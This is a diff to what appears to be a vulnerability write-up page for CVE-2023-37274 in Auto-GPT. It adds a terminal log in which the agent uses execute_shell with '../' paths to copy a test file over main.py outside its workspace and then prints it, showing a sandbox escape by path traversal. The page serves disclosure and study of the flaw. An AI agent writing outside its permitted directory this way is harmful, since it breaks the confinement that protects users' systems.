--- a/system/openai_cve_2023_37274.htm
+++ b/system/openai_cve_2023_37274.htm
@@ -42,8 +42,22 @@ $ ./run.py
     Input:y
 
     -=-=-=-=-=-=-= COMMAND AUTHORISED BY USER -=-=-=-=-=-=-= 
-    Executing python file '/home/steward/Downloads/AutoGPT/autogpt/auto_gpt_workspace/test.py' in working directory '/home/steward/Downloads/AutoGPT/autogpt/auto_gpt_workspace'
     SYSTEM:  Command execute_python_file returned: this is cve test file !
+
+$ ./run.py
+    I want Auto-GPT to: asisting with copy a file from '../../../test.py' to ../../main.py
+
+    NEXT ACTION:  COMMAND = execute_shell ARGUMENTS = {'command_line': 'cp ../../../test.py ../../main.py'}
+    Input:y
+
+    -=-=-=-=-=-=-= COMMAND AUTHORISED BY USER -=-=-=-=-=-=-=
+    SYSTEM:  Command execute_shell returned: STDOUT: b'' STDERR: b''
+
+    Input:print ../../main.py
+    NEXT ACTION:  COMMAND = execute_shell ARGUMENTS = {'command_line': 'cat ../../main.py'}
+
+    -=-=-=-=-=-=-= COMMAND AUTHORISED BY USER -=-=-=-=-=-=-=
+    SYSTEM:  Command execute_shell returned: STDOUT: b"print('this is cve test file !')\n" STDERR: b''
 </pre><br>
 
 <br><script type="text/javascript" src="../tail.js"></script>
